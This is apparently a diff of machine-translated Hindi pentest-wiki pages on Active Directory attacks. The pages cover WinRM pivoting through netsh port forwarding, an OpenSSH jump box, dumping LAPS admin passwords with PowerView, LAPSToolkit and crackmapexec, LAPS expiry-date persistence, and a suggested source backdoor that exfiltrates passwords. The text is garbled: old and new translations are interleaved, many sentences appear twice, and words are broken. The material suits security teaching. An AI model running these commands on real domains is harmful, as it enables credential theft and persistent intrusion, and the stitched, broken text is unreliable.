चूंकि हमारे पास इंटरमीडिएट टारगेट **bizintel: 10.35.8.17** पर स्थानीय प्रशासक है, आप एक पोर्ट फॉरवर्डिंग नियम जोड़कर अपने अनुरोधों को अंतिम/तीसरे सर्वर **secdev: 10.35.8.23** पर भेज सक हैं।
क्योंकि हमारे पास इंटरमीडिएट टारगेट **bizintel: 10.35.8.17** पर स्थानीय प्रशासक है, आप एक पोर्ट फॉरवर्डिंग नियम जोड़ सकते हैं ताकि आपके अनुरोध अंतिम/तीसरे सर्वर **secdev: 10.35.8.23** पर भेजे जा सकें।
आप एक वन-लाइनर निकालने और नियम जोड़ने के लिए त्वरित रूप से **netsh** का उपयोग कर सकते हैं।
**netsh** का उपयोग करके आप एक वन-लाइनर निकालकर नियम जोड़ सकते हैं।
```bash
netsh interface portproxy add v4tov4 listenport=5446 listenaddress=10.35.8.17 connectport=5985 connectaddress=10.35.8.23
```
तो **पहली सर्वर** पोर्ट 5446 पर सुन रही है और 5446 पर आने वाले अनुरोधों को **दूसरे सर्वर** पोर्ट 5985 (यानी WinRM) पर आगे भेजेगी
इसलिए **पहला सर्वर** पोर्ट 5446 पर सुन रहा है और 5446 पर पहुंचने वाले अनुरोधों को **दूसरे सर्वर** पोर्ट 5985 (यानी WinRM) पर फॉरवर्ड करेगा
फिर Windows फ़ायरवॉल में एक छेद बनाएं, जिसे एक तेज़ netsh one-liner के साथ भी किया जा सकता है।
फिर Windows फ़ायरवॉल में एक होल बनाएं, जिसे एक तेज netsh one-liner के साथ भी किया जा सकता है।
```bash
netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP localport=5446
```
अब सत्र स्थापित करें, जो हमें **पहले सर्वर**े पास आगे भेजेगा।
अब सत्र स्थापित करें, जो हमें **पहले सर्वर**ी ओर अग्रेषित करेगा।
<figure><img src="../../.gitbook/assets/image (3) (5) (1).png" alt=""><figcaption></figcaption></figure>
#### winrs.exe <a href="#winrsexe" id="winrsexe"></a>
**Portforwarding WinRM** अनुरोधों को भी **`winrs.exe`** का उपयोग करके काम करने लगता है। यदि आपको यह ज्ञात है कि PowerShell का अनुगमन किया जा रहा है, तो यह एक बेहतर विकल्प हो सकता है। नीचे दिए गए कमांड में `hostname` के रूप में "secdev" को परिणाम के रूप में लाता है।
**Portforwarding WinRM** अनुरोधों को भी लगता है कि यह काम करता है जब **`winrs.exe`** का उपयोग किया जाता है। यदि आपको यह पता है कि PowerShell को मॉनिटर किया जा रहा है, तो यह एक बेहतर विकल्प हो सकता है। नीचे दिए गए कमांड से `hostname` के रूप में “**secdev**” लौटाता है।
```bash
winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname
```
इसकी तरह, यह आक्रमणकारी सिस्टम कमांड को एक तर्क के रूप में जारी कर सकता है, जैसे `Invoke-Command`। एक सामान्य बैच स्क्रिप्ट उदाहरण _winrm.bat_:
<figure><img src="../../.gitbook/assets/image (2) (6) (2).png" alt=""><figcaption></figcaption></figure>
### OpenSSH <a href="#openssh" id="openssh"></a>
इस तरीके के लिए पहले सर्वर बॉक्स पर [OpenSSH इंस्टॉल करना](https://github.com/PowerShell/Win32-OpenSSH/wiki/Install-Win32-OpenSSH) आवश्यक होता है। विंडोज के लिए OpenSSH इंस्टॉल करना **पूरी तरह से CLI के माध्यम से** किया जा सकता है और यह बहुत कम समय लेता है - और यह मैलवेयर के रूप में नहीं फ्लैग होता है!
इस तकनीक के लिए [OpenSSH इंस्टॉल करना आवश्यक है](https://github.com/PowerShell/Win32-OpenSSH/wiki/Install-Win32-OpenSSH) पहले सर्वर बॉक्स पर। Windows के लिए OpenSSH इंस्टॉल करना **पूरी तरह से CLI के माध्यम से** किया जा सकता है और यह बहुत कम समय लेता है - और यह मैलवेयर के रूप में फ्लैग नहीं करता!
बेशक कुछ परिस्थितियों में यह संभव नहीं हो सकता है, यह ज्यादा बोझिल हो सकता है या यह एक सामान्य ऑपसेक जोखिम हो सकता है।
यह स्थितियों में संभावना है कि यह संभव नहीं हो सकता है, बहुत ज्यादा कठिन हो सकता है या सामान्य OpSec जोखिम हो सकता है।
यह तरीका विशेष रूप से एक जंप बॉक्स सेटअप पर उपयोगी हो सकता है - जहां एक अनुप्रयोगी नेटवर्क तक पहुंच होती है। एक बार SSH कनेक्शन स्थापित हो जाता है, उपयोगकर्ता/आक्रमणकारी अनुरोध के रूप में जितने भी `New-PSSession` की आवश्यकता होती है, उन्हें डबल-हॉप समस्या में धमाका नहीं करना पड़ता है।
यह तकनीक एक जंप बॉक्स सेटअप पर विशेष रूप से उपयोगी हो सकती है - जिसमें एक अन्यथा पहुंच योग्य नेटवर्क तक पहुंच हो। एक बार SSH कनेक्शन स्थापित हो जाता है, उपयोगकर्ता/हमलावर डबल-हॉप समस्या में बिना धमाके के सेगमेंटेड नेटवर्क के खिलाफ जितने भी `New-PSSession` की आवश्यकता हो, उन्हें आग लगा सकता है।
OpenSSH में **पासवर्ड प्रमाणीकरण** का उपयोग करने पर (कुंजी या केरबेरोस नहीं), **लॉगऑन प्रकार 8** यानी _नेटवर्क क्लियर पाठ लॉगऑन_ होता है। इसका अर्थ यह नहीं है कि आपका पासवर्ड साफ़ रूप में भेजा जाता है - यह वास्तव में SSH द्वारा एन्क्रिप्ट किया जाता है। आपके सत्र के लिए इसके [प्रमाणीकरण पैकेज](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonusera?redirectedfrom=MSDN) के माध्यम से यह स्पष्ट पाठ में अनबन्धित हो जाता है ताकि आपकी सत्र और अधिक ताजगी से भरे गए TGT का अनुरोध कर सकें!
जब OpenSSH में **पासवर्ड प्रमाणीकरण** का उपयोग किया जाता है (कुंजियों या कर्बेरोस नहीं), तो **लॉगऑन प्रकार 8** यानी _नेटवर्क क्लियर पाठ लॉगऑन_ होता है। यह यह नहीं मानना चाहिए कि आपका पासवर्ड साफ़ पाठ में भेजा जाता है - यह वास्तव में SSH द्वारा एन्क्रिप्ट किया जाता है। आपके सत्र के लिए यह आगमन के समय अपने [प्रमाणीकरण पैकेज](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonusera?redirectedfrom=MSDN) के माध्यम से स्पष्ट पाठ में अनएन्क्रिप्ट हो जाता है ताकि आपका सत्र और अधिक सर्वरों के लिए जूसी TGT का अनुरोध कर सके!
इससे आपको बीचकारी सर्वर को आपकी ओर से TGT का अनुरोध करने और प्राथमिक सर्वर पर स्थानीय रूप से संग्रहीत करने की अनुमति मिलती है। आपकी सत्र इस TGT का उपयोग करके अतिरिक्त सर्वरों के प्रतिद्वंद्वीकरण (PS रिमोट) के लिए प्रमाणित कर सकती है
इससे अंतरवर्ती सर्वर आपके पक्ष में एक TGT का अनुरोध कर सकता है और स्थानीय रूप से इसे स्टोर कर सकता है। आपका सत्र फिर इस TGT का उपयोग कर सकता है अधिक सर्वरों के प्रमाणीकरण(PS रिमोट) के लिए
#### OpenSSH इंस्टॉल स्थिति
अपने आक्रमणकारी बॉक्स पर सबसे नवीनतम [OpenSSH रिलीज़ ज़िप फ़ाइल](https://github.com/PowerShell/Win32-OpenSSH/releases) डाउनलोड करें और इसे स्थानांतरित करें (या इसे सीधे जंप बॉक्स पर डाउनलोड करें)।
नवीनतम [OpenSSH रिलीज़ ज़िप डाउनलोड करें github से](https://github.com/PowerShell/Win32-OpenSSH/releases) और इसे अपने हमलावर बॉक्स पर ले जाएं और इसे वहाँ ले जाएं (या सीधे जंप बॉक्स पर डाउनलोड करें)।
जहां चाहें वहां ज़िप फ़ाइल को अनबन्ध करें। फिर, इंस्टॉल स्क्रिप्ट - `Install-sshd.ps1` चलाएं
जहाँ चाहें वहाँ ज़िप को अनज़िप करें। फिर, इंस्टॉल स्क्रिप्ट चलाएं - `Install-sshd.ps1`
<figure><img src="../../.gitbook/assets/image (2) (1) (3).png" alt=""><figcaption></figcaption></figure>
अंततः, बस फायरवॉल नियम जोड़ें **पोर्ट 22 खोलने** के लिए। सुनिश्चित करें कि SSH सेवाएं इंस्टॉल की गई हैं, और उन्हें शुरू करें। ये दोनों सेवाएं SSH काम करने के लिए चालू होनी चाहिए।
अंत में, **पोर्ट 22 खोलने** के लिए एक फ़ायरवॉल नियम जोड़ें। SSH सेवाएं स्थापित होने की पुष्टि करें और उन्हें शुरू करें। इन दोनों सेवाओं को चलाने के लिए SSH की आवश्यकता होगी।
<figure><img src="../../.gitbook/assets/image (1) (7).png" alt=""><figcaption></figcaption></figure>
यदि आपको `Connection reset` त्रुटि मिलती है, तो अनुमतियों को अद्यतन करें ताकि **सभी: पढ़ें और क्रियान्वय करें** रूट OpenSSH निर्देशिका पर अनुमति हो।
यदि आपको `Connection reset` त्रुटि मिलती है, तो अनुमतियाँ अपडेट करें ताकि **सभी: पढ़ें और क्रियान्वित करें** रूट OpenSSH निर्देशिका पर।
```bash
icacls.exe "C:\Users\redsuit\Documents\ssh\OpenSSH-Win64" /grant Everyone:RX /T
```
@ -143,10 +135,10 @@ icacls.exe "C:\Users\redsuit\Documents\ssh\OpenSSH-Win64" /grant Everyone:RX /T
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह **The PEASS Family** की खोज करें
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके।**
</details>

View file

@ -4,21 +4,21 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details>
## मूलभूत जानकारी
## मूल जानकारी
**LAPS** आपको डोमेन-जुडिकेटेड कंप्यूटरों पर स्थानीय व्यवस्थापक पासवर्ड (जो **यादृच्छिक**, अद्वितीय और **नियमित रूप से बदलता है**) का प्रबंधन करने की अनुमति देता है। ये पासवर्ड सेंट्रली Active Directory में संग्रहीत होते हैं और ACL का उपयोग करके अधिकृत उपयोगकर्ताओं को प्रतिबंधित किया जाता है। पासवर्ड क्लाइंट से सर्वर तक Kerberos v5 और AES का उपयोग करके सुरक्षित रूप से यात्रा करते हैं।
**LAPS** आपको डोमेन-जुड़े कंप्यूटरों पर **स्थानीय व्यवस्थापक पासवर्ड** (जो **यादृच्छिक**, अद्वितीय, और **नियमित रूप से बदलता है**) प्रबंधित करने की अनुमति देता है। ये पासवर्ड सक्रिय निर्देशिका में केंद्रीय रूप से संग्रहीत होते हैं और एसीएल का उपयोग करके अधिकृत उपयोगकर्ताओं को प्रतिबंधित किया जाता है। पासवर्ड क्लाइंट से सर्वर तक Kerberos v5 और AES का उपयोग करके सुरक्षित रूप से हैं।
LAPS का उपयोग करते समय, डोमेन के **कंप्यूटर** ऑब्जेक्ट्स में **2 नए गुण** दिखाई देते हैं: **`ms-mcs-AdmPwd`** और **`ms-mcs-AdmPwdExpirationTime`**_._ ये गुण प्लेन-टेक्स्ट व्यवस्थापक पासवर्ड और समाप्ति समय को संग्रहीत करते हैं। फिर, डोमेन माहौल में, यह देखना दिलचस्प हो सकता है कि **कौन से उपयोगकर्ता** इन गुणों को पढ़ सकते हैं।
LAPS का उपयोग करते समय, डोमेन के **कंप्यूटर** ऑब्जेक्ट्स में **2 नए विशेषताएँ** प्रकट होती हैं: **`ms-mcs-AdmPwd`** और **`ms-mcs-AdmPwdExpirationTime`**। ये विशेषताएँ **सादा-पाठ व्यवस्थापक पासवर्ड और समाप्ति समय** समेत होती हैं। फिर, डोमेन वातावरण में, यह महत्वपूर्ण हो सकता है कि जांचें **कौन-कौन से उपयोगकर्ता** इन विशेषताओं को पढ़ सकते हैं।
### सक्रिय होने की जांच करे
### सक्रिय है या नही
```bash
reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled
@ -33,9 +33,9 @@ Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs
```
### LAPS पासवर्ड एक्सेस
आप `\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol` से **LAPS नीति को रॉ डाउनलोड** कर सकते हैं और फिर [**GPRegistryPolicyParser**](https://github.com/PowerShell/GPRegistryPolicyParser) पैकेज **`Parse-PolFile`** का उपयोग करके इस फ़ाइल को मानव-पठनीय स्वरूप में परिवर्तित किया जा सकता है।
आप **`\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol`** से **रॉ LAPS नीति डाउनलोड** कर सकते हैं और फिर [**GPRegistryPolicyParser**](https://github.com/PowerShell/GPRegistryPolicyParser) पैकेज **`Parse-PolFile`** का उपयोग करके इस फ़ाइल को मानव-पठनीय स्वरूप में रूपांतरित किया जा सकता है।
इसके अलावा, यदि हमें पहुंच है तो **नेटिव LAPS PowerShell cmdlets** का उपयोग किया जा सकता है:
इसके अतिरिक्त, यदि वे किसी मशीन पर स्थापित हैं जिसका हमारे पास पहुंच है, तो **नेटिव LAPS PowerShell cmdlets** का उपयोग किया जा सकता है:
```powershell
Get-Command *AdmPwd*
@ -56,7 +56,7 @@ Find-AdmPwdExtendedRights -Identity Workstations | fl
# Read the password
Get-AdmPwdPassword -ComputerName wkstn-2 | fl
```
**PowerView** का उपयोग यह भी किया जा सकता है कि पता लगाया जाए कि **कौन पासवर्ड को पढ़ सकता है और उसे पढ़ सकता है**:
**PowerView** का उपयोग किया जा सकता है ताकि पता लगा सके **कौन पासवर्ड को पढ़ सकता है और इसे पढ़ सकता है**:
```powershell
# Find the principals that have ReadPropery on ms-Mcs-AdmPwd
Get-AdmPwdPassword -ComputerName wkstn-2 | fl
@ -66,9 +66,9 @@ Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd
```
### LAPSToolkit
[LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) लेप्स के जाँच को कई फंक्शनों के साथ सुविधाजनक बनाता है।\
समें से एक है **`ExtendedRights`** के लिए **लेप्स सक्षम करने वाले सभी कंप्यूटरों का पार्सिंग**। यह दिखाएगा कि कौन से **समूह** विशेष रूप से **लेप्स पासवर्ड पढ़ने के लिए धारित** हैं, जो अक्सर संरक्षित समूहों में उपयोगकर्ता होते हैं।\
एक **खाता** जो एक कंप्यूटर को डोमेन में जोड़ता है, उस होस्ट पर `सभी Extended Rights` प्राप्त करता है, और यह अधिकार खाते को **पासवर्ड पढ़ने** की क्षमता देता है। जाँच में एक उपयोगकर्ता खाता दिखा सकता है जो होस्ट पर लप्स पासवर्ड पढ़ सकता है। यह हमें मदद कर सकता है **निश्चित AD उपयोगकर्ताओं** को लक्ष्य बनाने में जो लेप्स पासवर्ड पढ़ सकते हैं।
[LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) एलएपीएस की जांच को कई कार्यों के साथ सुविधाजनक बनाता है।
नमें से एक है **`ExtendedRights`** का **समापन करना** **लैप्स सक्षम सभी कंप्यूटरों** के लिए। यह दिखाएगा **समूह** विशेष रूप से **लैप्स पासवर्ड पढ़ने के लिए सम्मत किए गए**, जो अक्सर सुरक्षित समूहों में उपयोगकर्ता होते हैं।
एक **खाता** जो एक कंप्यूटर को एक डोमेन में शामिल करता है, उस होस्ट पर `सभी विस्तारित अधिकार` प्राप्त करता है, और यह अधिकार **खाते** को **पासवर्ड पढ़ने** की क्षमता देता है। सूचीकरण एक उपयोगकर्ता खाता दिखा सकता है जो होस्ट पर लप्स पासवर्ड पढ़ सकता है। यह हमें मदद कर सकता है **निश्चित एडी उपयोगकर्ताओं** को लक्षित करने में जो लैप्स पासवर्ड पढ़ सकते हैं।
```powershell
# Get groups that can read passwords
Find-LAPSDelegatedGroups
@ -92,18 +92,16 @@ ComputerName Password Expiration
------------ -------- ----------
DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf% 12/10/2022 13:24:41
```
## **क्रैकमैपेक्सेक के साथ LAPS पासवर्ड्स को डंप करना**
यदि पॉवरशेल तक पहुंच नहीं है, तो आप LDAP के माध्यम से इस विशेषाधिकार का दुरुपयोग करके दूरस्थ रूप से इस्तेमाल कर सकते हैं।
## **Crackmapexec के साथ LAPS पासवर्ड डंपिंग**
यदि powershell तक पहुंच नहीं है, तो आप इस विशेषाधिकार का दुरुपयोग LDAP के माध्यम से दूरस्थ रूप से कर सकते हैं।
```
crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
```
यह उपयोगकर्ता द्वारा पढ़े जा सकने वाले सभी पासवर्ड को डंप करेगा, जिससे आपको एक अलग उपयोगकर्ता के साथ बेहतर फुटहोल्ड मिलेगा।
## **LAPS Persistence**
### **समाप्ति तिथि**
एक बार व्यवस्थापक बनने के बाद, आप **पासवर्ड प्राप्त** कर सकते हैं और एक मशीन को **पासवर्ड अपडेट करने से रोक सकते** हैं जब आप **भविष्य में समाप्ति तिथि सेट करते** हैं
एक बार एडमिन बनने के बाद, यह संभव है कि आप **पासवर्ड** प्राप्त कर सकें और एक मशीन को **पासवर्ड** अपडेट करने से **रोकने** के लिए **समाप्ति तिथि को भविष्य में** सेट करके
```powershell
# Get expiration time
Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime
@ -113,23 +111,23 @@ Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime
Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
```
{% hint style="warning" %}
यदि कोई **एडमिन** **`Reset-AdmPwdPassword`** cmdlet का उपयोग करता है; या यदि LAPS GPO में **नीति द्वारा आवश्यकतानुसार से अधिक समय तक पासवर्ड समाप्ति की अनुमति नहीं है** इंगित करता है, तो पासवर्ड फिर से रीसेट हो जाएगा।
अगर **एडमिन** **`Reset-AdmPwdPassword`** cmdlet का उपयोग करता है; या अगर LAPS GPO में **जो नीति द्वारा आवश्यक समय से अधिक पासवर्ड समाप्ति की अनुमति नहीं है** तो पासवर्ड फिर से रीसेट हो जाएगा।
{% endhint %}
### बैकडोर
LAPS के मूल स्रोत कोड [यहाँ](https://github.com/GreyCorbel/admpwd) मिल सकता है, इसलिए कोड में एक बैकडोर डाला जा सकता है (उदाहरण के लिए `Main/AdmPwd.PS/Main.cs` में `Get-AdmPwdPassword` विधि के अंदर) जो किसी तरह से **नए पासवर्डों को निकालेगा या कहीं संग्रहीत करेगा**।
LAPS के लिए मूल स्रोत कोड [यहाँ](https://github.com/GreyCorbel/admpwd) पाया जा सकता है, इसलिए कोड में एक बैकडोर डालना संभव है (उदाहरण के लिए `Main/AdmPwd.PS/Main.cs` में `Get-AdmPwdPassword` विधि के अंदर) जो किसी प्रकार से **नए पासवर्डों को बाहर ले जाए या किसी जगह पर संग्रहित करे**।
फिर, नया `AdmPwd.PS.dll` कंपाइल करें और इसे मशीन में `C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll` पर अपलोड करें (और संशोधन समय बदलें)।
फिर, नया `AdmPwd.PS.dll`ो कंपाइल करें और इसे मशीन में `C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll` में अपलोड करें (और संशोधन समय बदलें)।
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति** चाहिए? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण को देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details>

View file

@ -1,28 +1,42 @@
# ओवर पास द हैश/पास द की (PTK)
# Over Pass the Hash/Pass the Key
यह हमला **उपयोगकर्ता NTLM हैश या AES कुंजी का उपयोग करके केरबेरोस टिकट का अनुरोध करने** का उद्देश्य रखता है, सामान्यतः NTLM प्रोटोकॉल पर पास द हैश के स्थानांतरण के विकल्प के रूप में। इसलिए, यह विशेष रूप से **उपयोगी हो सकता है जहां NTLM प्रोटोकॉल अक्षम है** और केवल **केरबेरोस को प्रमाणित करने की अनुमति है**
<details>
इस हमले को करने के लिए, **लक्षित उपयोगकर्ता खाते का NTLM हैश (या पासवर्ड) चाहिए**। इसलिए, एक उपयोगकर्ता हैश प्राप्त करने के बाद, उस खाते के लिए एक TGT अनुरोध किया जा सकता है। अंत में, यह संभव होता है कि किसी भी सेवा या मशीन तक पहुंचा जा सके जहां **उपयोगकर्ता खाते की अनुमति होती है**
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details>
## Overpass The Hash/Pass The Key (PTK)
